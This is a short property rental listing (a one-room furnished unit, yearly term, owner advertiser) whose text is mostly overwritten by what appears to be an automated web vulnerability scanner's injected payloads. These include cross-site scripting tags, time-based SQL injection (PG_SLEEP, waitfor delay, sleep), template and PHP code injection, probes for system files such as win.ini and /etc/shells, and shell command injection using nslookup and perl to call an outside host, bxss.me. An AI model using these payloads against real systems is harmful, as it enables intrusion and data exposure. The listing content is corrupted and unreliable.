- Rental term: Yearly
- Floor: Higher than 6 Floor
- Furnished / Unfurnished: Furnished
- Number of rooms: 1 Room
- Number of Bathrooms: 2 Bathrooms
- Building Area m²: 51 - 100 sq.m
- Advertiser: Owner
- Residential occupancy: Uninhabited
- Rent and payment system: Monthly
- Building Age: 1 - 5 Year
}body{acu:Expre/**/SSion(UQrN(9408))}
<ScRiPt>UQrN(9142)</sCripT>
\u003CScRiPt\UQrN(9045)\u003C/sCripT\u003E
%0D%0A%3C%53%63%52%69%50%74%20%3E%55%51%72%4E%289450%29%3C%2F%73%43%72%69%70%54%3E
"acxzzzzzzzzbbbccccdddeeexca".replace("z","o")
acx__${98991*97996}__::.x
acx[[${98991*97996}]]xca
acx{{98991*97996}}xca
AAABBBCCC{{define "bla"}}bla{{end}}{{define "acx"}}xyz{{end}}{{template "acx"}}CCCBBBAAA
acx{{'abcd'.toUpperCase()}}xca
acx#{xca}=123
#{98991*97996*98991*97996}
acx{{{this}}}xca
acx{@math key=98991 method="multiply" operand=97996/}xca
98991*97996*98991*97996
print("acx" . 98991*97996 . "xca");
acx{{"abc"|title}}xca
acx#set($x=98991*97996)${x}xca
acx<%=98991*97996%>xca
acx@(98991*97996)xca
acx{{=98991*97996}}xca
acx{@98991*97996}xca
acx{#98991*97996}xca
acx#{98991*97996}xca
acx${98991*97996}xca
acx{98991*97996}xca
acx{{98991*97996}}xca
acx{{98991*97996}}xca
<%={{={@{#{${acx}}%>
acux2520��z1��z2a�bcxuca2520
acu6357<s1﹥s2ʺs3ʹuca6357
9433901
@@6Y73G
1 ����%2527%2522
1'"
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
E7Bc6GA5')) OR 139=(SELECT 139 FROM PG_SLEEP(15))--
33G0feKZ') OR 770=(SELECT 770 FROM PG_SLEEP(15))--
vFgZzB1D' OR 505=(SELECT 505 FROM PG_SLEEP(15))--
-1)) OR 485=(SELECT 485 FROM PG_SLEEP(15))--
-5) OR 202=(SELECT 202 FROM PG_SLEEP(15))--
-5 OR 242=(SELECT 242 FROM PG_SLEEP(15))--
A7N1YHnw')); waitfor delay '0:0:15' --
vVoU0uvr'); waitfor delay '0:0:15' --
z1evPu51'; waitfor delay '0:0:15' --
1 waitfor delay '0:0:15' --
-1)); waitfor delay '0:0:15' --
-1); waitfor delay '0:0:15' --
}body{acu:Expre/**/SSion(dIyD(9747))}
-1; waitfor delay '0:0:15' --
<ScRiPt>dIyD(9390)</sCripT>
\u003CScRiPt\dIyD(9054)\u003C/sCripT\u003E
%0D%0A%3C%53%63%52%69%50%74%20%3E%64%49%79%44%289606%29%3C%2F%73%43%72%69%70%54%3E
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
"acxzzzzzzzzbbbccccdddeeexca".replace("z","o")
acx__${98991*97996}__::.x
acx[[${98991*97996}]]xca
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
acx{{98991*97996}}xca
1}}"}}'}}1%>"%>'%><%={{={@{#{${acx}}%>
<%={{={@{#{${acx}}%>
acux4484��z1��z2a�bcxuca4484
acu1479<s1﹥s2ʺs3ʹuca1479
9206887
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
if(now()=sysdate(),sleep(15),0)
-1 OR 3*2>(0+5+413-413)
-1 OR 3*2<(0+5+413-413)
-1 OR 3+413-413-1=0+0+0+1
-1 OR 2+413-413-1=0+0+0+1
1*
1*
1*
1*
CmAT7fuP
}body{acu:Expre/**/SSion(gcRb(9263))}
<ScRiPt>gcRb(9537)</sCripT>
\u003CScRiPt\gcRb(9067)\u003C/sCripT\u003E
%0D%0A%3C%53%63%52%69%50%74%20%3E%67%63%52%62%289309%29%3C%2F%73%43%72%69%70%54%3E
"acxzzzzzzzzbbbccccdddeeexca".replace("z","o")
acx__${98991*97996}__::.x
acx[[${98991*97996}]]xca
acx{{98991*97996}}xca
1}}"}}'}}1%>"%>'%><%={{={@{#{${acx}}%>
<%={{={@{#{${acx}}%>
acux6578��z1��z2a�bcxuca6578
acu7311<s1﹥s2ʺs3ʹuca7311
9063200
bxss.me
c:/windows/win.ini
/etc/shells
http://bxss.me/t/fit.txt?.jpg
'.print(md5(31337)).'
Http://bxss.me/t/fit.txt
${@print(md5(31337))}\
1some_inexistent_file_with_long_name .jpg
/\xfs.bxss.me
http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg
//xfs.bxss.me
http://xfs.bxss.me
${@print(md5(31337))}
980081
";print(md5(31337));$a="
';print(md5(31337));$a='
/xfs.bxss.me
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
;(nslookup hithaveqmzpwyf526d.bxss.me||perl -e "gethostbyname('hithaveqmzpwyf526d.bxss.me')")|(nslookup hithaveqmzpwyf526d.bxss.me||perl -e "gethostbyname('hithaveqmzpwyf526d.bxss.me')")&(nslookup hithaveqmzpwyf526d.bxss.me||perl -e "gethostbyname('hithaveqmzpwyf526d.bxss.me')")
`(nslookup hitfzwpwlggwd3b8e7.bxss.me||perl -e "gethostbyname('hitfzwpwlggwd3b8e7.bxss.me')")`
|(nslookup hitdgujqdhnrt18e2a.bxss.me||perl -e "gethostbyname('hitdgujqdhnrt18e2a.bxss.me')")
ratecatalog/.
'"
&(nslookup hitqdxshsmnwqb07f5.bxss.me||perl -e "gethostbyname('hitqdxshsmnwqb07f5.bxss.me')")&'\"`0&(nslookup hitqdxshsmnwqb07f5.bxss.me||perl -e "gethostbyname('hitqdxshsmnwqb07f5.bxss.me')")&`'
ratecatalog
ratecatalog
$(nslookup hitjewgfjjimw7c36e.bxss.me||perl -e "gethostbyname('hitjewgfjjimw7c36e.bxss.me')")
(nslookup hitwolrwicnnr997d1.bxss.me||perl -e "gethostbyname('hitwolrwicnnr997d1.bxss.me')")
|echo rfpgbt$()\ malbvp\nz^xyu||a #' |echo rfpgbt$()\ malbvp\nz^xyu||a #|" |echo rfpgbt$()\ malbvp\nz^xyu||a #
'+'A'.concat(70-3).concat(22*4).concat(112).concat(78).concat(105).concat(84)+(require'socket' Socket.gethostbyname('hitvf'+'zptgdafnd4533.bxss.me.')[3].to_s)+'
&echo abnhtd$()\ nkvudj\nz^xyu||a #' &echo abnhtd$()\ nkvudj\nz^xyu||a #|" &echo abnhtd$()\ nkvudj\nz^xyu||a #
"+"A".concat(70-3).concat(22*4).concat(116).concat(79).concat(111).concat(67)+(require"socket" Socket.gethostbyname("hitnr"+"arwsiomh3cc9c.bxss.me.")[3].to_s)+"
echo afgqpb$()\ fmulga\nz^xyu||a #' &echo afgqpb$()\ fmulga\nz^xyu||a #|" &echo afgqpb$()\ fmulga\nz^xyu||a #
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
bxss.me/t/xss.html?%00
'"()
^(#$!@#$)(()))******
HttP://bxss.me/t/xss.html?%00
".gethostbyname(lc("hitqh"."pynahozd7f1e5.bxss.me."))."A".chr(67).chr(hex("58")).chr(106).chr(89).chr(102).chr(86)."
!(()&&!|*|*|
'.gethostbyname(lc('hitur'.'ehfrkhwq7788e.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(108).chr(87).chr(110).chr(80).'
)
./
ctime sleep p0 (I30 tp1 Rp2 .
../
12345'"\'\");|]* { <